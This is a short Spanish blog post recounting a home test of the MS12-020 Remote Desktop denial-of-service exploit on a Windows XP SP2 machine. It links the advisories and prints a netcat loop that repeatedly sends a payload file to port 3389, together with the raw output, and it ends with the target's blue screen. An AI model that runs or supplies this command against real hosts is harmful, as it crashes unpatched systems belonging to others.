MS12-020 – KB2671387 – exploit a terminal server

Ayer probé el famoso exploit de la última vulnerabilidad de Windows con Terminal Server o Escritorio Remoto sobre un PC de mi casa con XP SP2.
Resultado positivo, es una Denegación de Servicio ( DoS ) y el exploit no necesita compilarse.
Con un simple netcat, como ya sale en el ejemplo de la descripción del exploit, es suficiente.
Así que es fácilmente explotable desde un windows, un linux, BSD, mac etc.

Detalles de la vulnerabilidad :

En Microsoft :
http://technet.microsoft.com/es-es/security/bulletin/ms12-020

En la national vulnerability Database:
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-0002

En la prueba pude ver que si no estabas logado en el windows no funciona.

Aquí val el output:

[root@micasa ~]# while true; do nc 192.168.1.10 3389 < termdd_1.dat; sleep 1;done
Ð4
ð€< î
Ð4
ð€< î  ð€.
Ð4
ð€< î  ð€.
Ð4
...

Finalmente el host mostró un pantallazo azul ( BSOD )

 

 

 

 

Leave a Reply

Your email address will not be published. Required fields are marked *